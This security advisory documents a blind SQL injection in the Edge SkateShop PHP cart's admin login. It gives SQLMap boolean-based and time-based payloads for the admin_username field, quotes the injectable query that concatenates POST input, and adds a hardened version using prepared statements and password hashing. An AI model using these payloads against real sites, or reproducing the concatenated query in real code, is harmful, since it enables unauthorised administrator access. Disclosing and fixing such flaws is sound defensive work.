Edge SkateShop Blind SQL Injection



EKU-ID: 6161 CVE: OSVDB-ID:
Author: Andrea Bocchetti Published: 2016-12-19 Verified: Verified


# Exploit Title: Edge SkateShop Blind Sql Injection
# Date: 12/12/2016
# Exploit Author: Andrea Bocchetti
# Vendor HomePage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html
# Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip
# Version : n/a
# Tested on: kali linux
 
# Proof of Concept (Using SQLMap) :
 
Parameter: admin_username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: admin_username=-8520' OR 6015=6015-- PORX&admin_password=&admin_login=Scmp

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: admin_username=yzsT' OR SLEEP(5)-- Qgnn&admin_password=&admin_login=Scmp


Issue :
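if(isset($_POST['admin_login']))
{
    // Both request values are taken from the POST body without validation or escaping.
    $admin_username=$_POST['admin_username'];
    $admin_password=$_POST['admin_password'];

    // Vulnerable statement: the values are concatenated straight into the SQL text,
    // so a single quote in admin_username closes the string literal and the rest of
    // the input is parsed as part of the WHERE clause.
    $check_admin="select * from admin WHERE admin_username='$admin_username' AND admin_password='$admin_password'";

    $run=mysqli_query($dbcon,$check_admin);

    // Any returned row counts as a successful login.
    if(mysqli_num_rows($run))
    {
        echo "<script>alert('You're successfully login!')</script>";
        echo "<script>window.open('Admin/index.php','_self')</script>";
        $_SESSION['admin_username']=$admin_username;
    }
    else
    {
        echo "<script>alert('Username or password is incorrect!')</script>";
        echo "<script>window.open('index.php','_self')</script>";
        exit();
    }
}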
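
A hardened form of the login check above, as an added example that is not part of the original advisory or the vendor's code. It assumes $dbcon is the application's existing mysqli connection and that admin_password has been migrated to store password_hash() output; the function name check_admin_login is hypothetical.

```php
<?php
// Added example, not the vendor's code. Assumptions: $dbcon is the
// application's mysqli connection and admin.admin_password has been migrated
// to hold password_hash() output.
session_start();

function check_admin_login(mysqli $dbcon, string $username, string $password): bool
{
    // The ? placeholder sends the username as data, never as SQL text, so
    // input such as -8520' OR 6015=6015-- is just a name that matches no row.
    $stmt = mysqli_prepare(
        $dbcon,
        'SELECT admin_password FROM admin WHERE admin_username = ? LIMIT 1'
    );
    if ($stmt === false) {
        return false;
    }
    mysqli_stmt_bind_param($stmt, 's', $username);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_bind_result($stmt, $stored_hash);
    $found = mysqli_stmt_fetch($stmt) === true;
    mysqli_stmt_close($stmt);

    // Verify the password in PHP instead of inside the WHERE clause.
    return $found && password_verify($password, (string) $stored_hash);
}

if (isset($_POST['admin_login'])) {
    $username = $_POST['admin_username'] ?? '';
    $password = $_POST['admin_password'] ?? '';

    // Reject array-valued parameters (admin_username[]=...) before use.
    if (is_string($username) && is_string($password)
        && check_admin_login($dbcon, $username, $password)) {
        session_regenerate_id(true);   // fresh session ID on privilege change
        $_SESSION['admin_username'] = $username;
        header('Location: Admin/index.php');
        exit();
    }
    header('Location: index.php');
    exit();
}
```

Because the failure path no longer depends on how the database parsed the input, neither the boolean-based nor the time-based payload reported by SQLMap changes the query that is executed.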